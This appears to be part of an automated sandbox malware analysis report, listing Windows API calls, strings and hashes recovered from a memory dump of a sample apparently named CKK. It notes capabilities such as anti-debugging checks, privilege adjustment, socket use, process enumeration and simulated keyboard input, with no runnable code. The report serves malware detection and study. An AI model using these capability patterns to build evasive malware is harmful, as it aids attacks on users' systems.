                                                                                              • Instruction Fuzzy Hash: 3531D072504315AFDB20DF54DC49B5BBBAAFF84720F004919F9899B181DB34EA09CBA2
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                                • Part of subcall function 009F9CB3: _wcslen.LIBCMT ref: 009F9CBD
                                                                                              • FindFirstFileW.KERNEL32(00000001,?,*.*,?,?,00000000,00000000), ref: 00A69B78
                                                                                              • FindClose.KERNEL32(00000000,?,00000000,00000000), ref: 00A69C8B
                                                                                                • Part of subcall function 00A63874: GetInputState.USER32 ref: 00A638CB
                                                                                                • Part of subcall function 00A63874: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00A63966
                                                                                              • Sleep.KERNEL32(0000000A,?,00000000,00000000), ref: 00A69BA8
                                                                                              • FindNextFileW.KERNEL32(?,?,?,00000000,00000000), ref: 00A69C75
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                              • Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd
                                                                                              Similarity
                                                                                              • API ID: Find$File$CloseFirstInputMessageNextPeekSleepState_wcslen
                                                                                              • String ID: *.*
                                                                                              • API String ID: 1972594611-438819550
                                                                                              • Opcode ID: ed4a6c20ab5cf485f807f1f4d8983e0aed0b39eaedb4605caf312b0316762d3e
                                                                                              • Instruction ID: 137fd5289a01c50b6667498774318eab6a6aea69e2edebf324d58cbccdececbd
                                                                                              • Opcode Fuzzy Hash: ed4a6c20ab5cf485f807f1f4d8983e0aed0b39eaedb4605caf312b0316762d3e
                                                                                              • Instruction Fuzzy Hash: 93415F7190420AAFCF55EFA4C989AEEBBF8FF49350F244155F805A2191EB309E85CF61
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                                • Part of subcall function 00A7304E: inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 00A7307A
                                                                                                • Part of subcall function 00A7304E: _wcslen.LIBCMT ref: 00A7309B
                                                                                              • socket.WSOCK32(00000002,00000002,00000011,?,?,00000000), ref: 00A7185D
                                                                                              • WSAGetLastError.WSOCK32 ref: 00A71884
                                                                                              • bind.WSOCK32(00000000,?,00000010), ref: 00A718DB
                                                                                              • WSAGetLastError.WSOCK32 ref: 00A718E6
                                                                                              • closesocket.WSOCK32(00000000), ref: 00A71915
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                              • Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd
                                                                                              Similarity
                                                                                              • API ID: ErrorLast$_wcslenbindclosesocketinet_addrsocket
                                                                                              • String ID:
                                                                                              • API String ID: 1601658205-0
                                                                                              • Opcode ID: 92521e4d2c5ce21d4cee4699b5609330ba17b3bc0fdbcd0cb240b519a0447a8f
                                                                                              • Instruction ID: 5ead8a4bac6689b8c34dc735239a24fb67b91c980ffde9ad8c165dd2f8cd03d8
                                                                                              • Opcode Fuzzy Hash: 92521e4d2c5ce21d4cee4699b5609330ba17b3bc0fdbcd0cb240b519a0447a8f
                                                                                              • Instruction Fuzzy Hash: CC51C471A00204AFDB10EF64C886F7AB7E5AB84718F04C058FA099F3C3D771AD428BA1
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                              • Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: ERCP$VUUU$VUUU$VUUU$VUUU
                                                                                              • API String ID: 0-1546025612
                                                                                              • Opcode ID: 73317bb7ed8eee6c50eb4e0aa008168c16debebfcc398c6aea55d7d50da59807
                                                                                              • Instruction ID: 133e2e2d18f3f178d3d0fc8f44984138a740b59ed12135c6fdb367e9443f59b6
                                                                                              • Opcode Fuzzy Hash: 73317bb7ed8eee6c50eb4e0aa008168c16debebfcc398c6aea55d7d50da59807
                                                                                              • Instruction Fuzzy Hash: 49A27A71E0061ACBDF64CF68C8447BEB7B1BB54314F2485AAE915AB284EB749D81CF90
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • CreateToolhelp32Snapshot.KERNEL32 ref: 00A7A6AC
                                                                                              • Process32FirstW.KERNEL32(00000000,?), ref: 00A7A6BA
                                                                                                • Part of subcall function 009F9CB3: _wcslen.LIBCMT ref: 009F9CBD
                                                                                              • Process32NextW.KERNEL32(00000000,?), ref: 00A7A79C
                                                                                              • CloseHandle.KERNEL32(00000000), ref: 00A7A7AB
                                                                                                • Part of subcall function 00A0CE60: CompareStringW.KERNEL32(00000409,00000001,?,00000000,00000000,?,?,00000000,?,00A33303,?), ref: 00A0CE8A
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                              • Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd
                                                                                              Similarity
                                                                                              • API ID: Process32$CloseCompareCreateFirstHandleNextSnapshotStringToolhelp32_wcslen
                                                                                              • String ID:
                                                                                              • API String ID: 1991900642-0
                                                                                              • Opcode ID: 51a384cc9a3785482301aa2abd2841cf128f180e89127d5af0f7fd9870d5cfad
                                                                                              • Instruction ID: 2af095fd5995a0348dbd673bf12fd0b3eb2b263991e9c92d54ac3b9c410d372e
                                                                                              • Opcode Fuzzy Hash: 51a384cc9a3785482301aa2abd2841cf128f180e89127d5af0f7fd9870d5cfad
                                                                                              • Instruction Fuzzy Hash: C9514CB1508304AFD710EF24D986A6BBBE8FFC9754F00891DF58997292EB70D904CB92
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • GetKeyboardState.USER32(?), ref: 00A5AAAC
                                                                                              • SetKeyboardState.USER32(00000080), ref: 00A5AAC8
                                                                                              • PostMessageW.USER32 ref: 00A5AB36
                                                                                              • SendInput.USER32(00000001,?,0000001C), ref: 00A5AB88
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                              • Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd
                                                                                              Similarity
                                                                                              • API ID: KeyboardState$InputMessagePostSend
                                                                                              • String ID:
                                                                                              • API String ID: 432972143-0
                                                                                              • Opcode ID: 8388464c83a30954a3aef5191aad1556b869456157a105fd20c3b916c9fbf4ff
                                                                                              • Instruction ID: 4161acef8dfe21733a91ce1e0c0dc6227826a4c3ea39f068968e4cd88d5d3891
                                                                                              • Opcode Fuzzy Hash: 8388464c83a30954a3aef5191aad1556b869456157a105fd20c3b916c9fbf4ff
                                                                                              • Instruction Fuzzy Hash: A531E530B40248AEEB35CB689C05BFA7BA6BB64322F04431AF981561D1D3758D89C7A2
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • InternetReadFile.WININET(?,?,00000400,?), ref: 00A6CE89
                                                                                              • GetLastError.KERNEL32(?,00000000), ref: 00A6CEEA
                                                                                              • SetEvent.KERNEL32(?,?,00000000), ref: 00A6CEFE
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                              • Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd
                                                                                              Similarity
                                                                                              • API ID: ErrorEventFileInternetLastRead
                                                                                              • String ID:
                                                                                              • API String ID: 234945975-0
                                                                                              • Opcode ID: 8e42b8819d854d8b0446f74132341fef01746eccf938360096b622d94fb39b3c
                                                                                              • Instruction ID: 4655c1d279f6c4f1e6103509dcbd9279f3fbef934f3e09a479cc157fc6d6a1d3
                                                                                              • Opcode Fuzzy Hash: 8e42b8819d854d8b0446f74132341fef01746eccf938360096b622d94fb39b3c
                                                                                              • Instruction Fuzzy Hash: 8421AFB1600305ABDB20DFA5C948BA7B7FCEB50364F10441EE696D2151E775EE45CF60
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • lstrlenW.KERNEL32(?,?,?,00000000), ref: 00A582AA
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                              • Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd
                                                                                              Similarity
                                                                                              • API ID: lstrlen
                                                                                              • String ID: ($|
                                                                                              • API String ID: 1659193697-1631851259
                                                                                              • Opcode ID: 0d217b7e22c064c1ee35fb0943c367fed78e6a7b2ab3612010f3c669c1bf6c0c
                                                                                              • Instruction ID: 52591890a5187ba25768bf98f959171e56fd476a4e1b0136494687db1406a0c6
                                                                                              • Opcode Fuzzy Hash: 0d217b7e22c064c1ee35fb0943c367fed78e6a7b2ab3612010f3c669c1bf6c0c
                                                                                              • Instruction Fuzzy Hash: AF322775A00605DFCB28CF59C48196AB7F0FF48720B15C56EE89AEB7A1EB74E941CB40
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • FindFirstFileW.KERNEL32(?,?), ref: 00A65CC1
                                                                                              • FindNextFileW.KERNEL32(00000000,?), ref: 00A65D17
                                                                                              • FindClose.KERNEL32(?), ref: 00A65D5F
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                              • Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd
                                                                                              Similarity
                                                                                              • API ID: Find$File$CloseFirstNext
                                                                                              • String ID:
                                                                                              • API String ID: 3541575487-0
                                                                                              • Opcode ID: 260e85ca64a199a091e06c57de8585eb4f374fbf127a5de02c5ac5203e74a1ee
                                                                                              • Instruction ID: 72c9f0960d0ff6829807f94617ecfb0fd6ddf174fe3aff18263df302d5d3472a
                                                                                              • Opcode Fuzzy Hash: 260e85ca64a199a091e06c57de8585eb4f374fbf127a5de02c5ac5203e74a1ee
                                                                                              • Instruction Fuzzy Hash: 33517774A04A01DFC714DF28C494AAAB7F4FF49324F14855EE99A8B3A2DB30E945CF91
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • IsDebuggerPresent.KERNEL32 ref: 00A2271A
                                                                                              • SetUnhandledExceptionFilter.KERNEL32 ref: 00A22724
                                                                                              • UnhandledExceptionFilter.KERNEL32(?), ref: 00A22731
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                              • Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd
                                                                                              Similarity
                                                                                              • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                              • String ID:
                                                                                              • API String ID: 3906539128-0
                                                                                              • Opcode ID: 4da74ddcbc5fe7a5b99e7daf127eacb0eb132981f3d4bd843e60363f49586a57
                                                                                              • Instruction ID: f1a242505be2f3087a747a0a5c8b3bd20f208f8ad60c506a3714ca0d09338cd5
                                                                                              • Opcode Fuzzy Hash: 4da74ddcbc5fe7a5b99e7daf127eacb0eb132981f3d4bd843e60363f49586a57
                                                                                              • Instruction Fuzzy Hash: 7831B57591122CABCB21DF68DD89BDDB7B8AF08310F5041EAE81CA7261E7709F818F55
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • SetErrorMode.KERNEL32(00000001), ref: 00A651DA
                                                                                              • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 00A65238
                                                                                              • SetErrorMode.KERNEL32(00000000), ref: 00A652A1
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                              • Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd
                                                                                              Similarity
                                                                                              • API ID: ErrorMode$DiskFreeSpace
                                                                                              • String ID:
                                                                                              • API String ID: 1682464887-0
                                                                                              • Opcode ID: 6979d2192b3ab3becff7e7774b6d5590fd4fa82da48dbb3beca463b155159afd
                                                                                              • Instruction ID: 81adb10dfe4346c682055a2efee55c4e054a7065dd7f4b6e026a34fdfdb2261c
                                                                                              • Opcode Fuzzy Hash: 6979d2192b3ab3becff7e7774b6d5590fd4fa82da48dbb3beca463b155159afd
                                                                                              • Instruction Fuzzy Hash: FE312B75A00518DFDB00DFA4D894FADBBB4FF49314F048099E905AB3A2DB31E856CBA0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                                • Part of subcall function 00A0FDDB: __CxxThrowException@8.LIBVCRUNTIME ref: 00A10668
                                                                                                • Part of subcall function 00A0FDDB: __CxxThrowException@8.LIBVCRUNTIME ref: 00A10685
                                                                                              • LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00A5170D
                                                                                              • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00A5173A
                                                                                              • GetLastError.KERNEL32 ref: 00A5174A
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                              • Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd
                                                                                              Similarity
                                                                                              • API ID: Exception@8Throw$AdjustErrorLastLookupPrivilegePrivilegesTokenValue
                                                                                              • String ID:
                                                                                              • API String ID: 577356006-0
                                                                                              • Opcode ID: 8bfc270d93dc66266c6bd9fd7566d2c8677a2461d895675ecdbdaa9c31a95b4f
                                                                                              • Instruction ID: 4537c738623d4470c146541778eaafbec471b7e34cb3f97704770836bbe6ef81
                                                                                              • Opcode Fuzzy Hash: 8bfc270d93dc66266c6bd9fd7566d2c8677a2461d895675ecdbdaa9c31a95b4f
                                                                                              • Instruction Fuzzy Hash: 691104B1400308AFD718DF64EC86E6BB7B9FB44715B20842EF45653641EB70BC418F20
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • CreateFileW.KERNEL32(?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 00A5D608
                                                                                              • DeviceIoControl.KERNEL32(00000000,002D1400,?,0000000C,?,00000028,?,00000000), ref: 00A5D645
                                                                                              • CloseHandle.KERNEL32(?), ref: 00A5D650
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                              • Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd
                                                                                              Similarity
                                                                                              • API ID: CloseControlCreateDeviceFileHandle
                                                                                              • String ID:
                                                                                              • API String ID: 33631002-0
                                                                                              • Opcode ID: 328c432e3f228b879d0857aa0685cdeec461e62a58e5627d575777d14922a78c
                                                                                              • Instruction ID: 40934e0e8ec6ffcc4db0c852dbd59aca6c945704e4f9ba21024f1515ff82a030
                                                                                              • Opcode Fuzzy Hash: 328c432e3f228b879d0857aa0685cdeec461e62a58e5627d575777d14922a78c
                                                                                              • Instruction Fuzzy Hash: 6E113C75E05228BBDB208F959C45FAFBBBCEB45B60F108115F904E7290D6704A068BA1
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 00A5168C
                                                                                              • CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 00A516A1
                                                                                              • FreeSid.ADVAPI32(?), ref: 00A516B1
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                              • Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd
                                                                                              Similarity
                                                                                              • API ID: AllocateCheckFreeInitializeMembershipToken
                                                                                              • String ID:
                                                                                              • API String ID: 3429775523-0
                                                                                              • Opcode ID: 5c84e6f681379d68421862752923b0e95fdf6d3ced1331dda767ac84fb7500c0
                                                                                              • Instruction ID: 7efbad39266894a70906a04d0d50a9ef0d77f64f343f022aed2958d6b1f3e48f
                                                                                              • Opcode Fuzzy Hash: 5c84e6f681379d68421862752923b0e95fdf6d3ced1331dda767ac84fb7500c0
                                                                                              • Instruction Fuzzy Hash: FCF04471940308FBDB00CFE09C89EAEBBBCFB08250F104460E900E2180E330AA048B60
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                              • Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: /
                                                                                              • API String ID: 0-2043925204
                                                                                              • Opcode ID: 48147284b9991c2e10f228de82031367036e7bb5f8ff1a54c6bada4bf8a02fd3
                                                                                              • Instruction ID: 6464280697fc919e369bb5f5678f1e74cd017ee584cd68064def42cc2bd8b1c4
                                                                                              • Opcode Fuzzy Hash: 48147284b9991c2e10f228de82031367036e7bb5f8ff1a54c6bada4bf8a02fd3
                                                                                              • Instruction Fuzzy Hash: C5412872500229ABCB24EFBDEC49EAFB778EB84764F104679F915DB180E6709D818B50
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • GetUserNameW.ADVAPI32(?,?), ref: 00A4D28C
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                              • Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd
                                                                                              Similarity
                                                                                              • API ID: NameUser
                                                                                              • String ID: X64
                                                                                              • API String ID: 2645101109-893830106
                                                                                              • Opcode ID: 8e46c39125e91e7e99f1a1762fcf2726c8dc3ac2eb163e44736e5c3b5e4e8162
                                                                                              • Instruction ID: 5fc0ab72c132ef0529bff7a8795f25cee740d7441e1c0bbc2aefa393556b3bc8
                                                                                              • Opcode Fuzzy Hash: 8e46c39125e91e7e99f1a1762fcf2726c8dc3ac2eb163e44736e5c3b5e4e8162
                                                                                              • Instruction Fuzzy Hash: 80D0CAB980112DEBCB90CBE0EC88DDAB3BCBB04346F100292F10AA2140DBB096498F20
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                              • Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 2fbdbeface8d474e65e3d830227d731b015bc4fe83c76ff0107a9da6199ccf29
                                                                                              • Instruction ID: 4702e0f6e873af4961bf6785eb0fd02d7feea8bb9f71cb225b3f0f89e486d3f1
                                                                                              • Opcode Fuzzy Hash: 2fbdbeface8d474e65e3d830227d731b015bc4fe83c76ff0107a9da6199ccf29
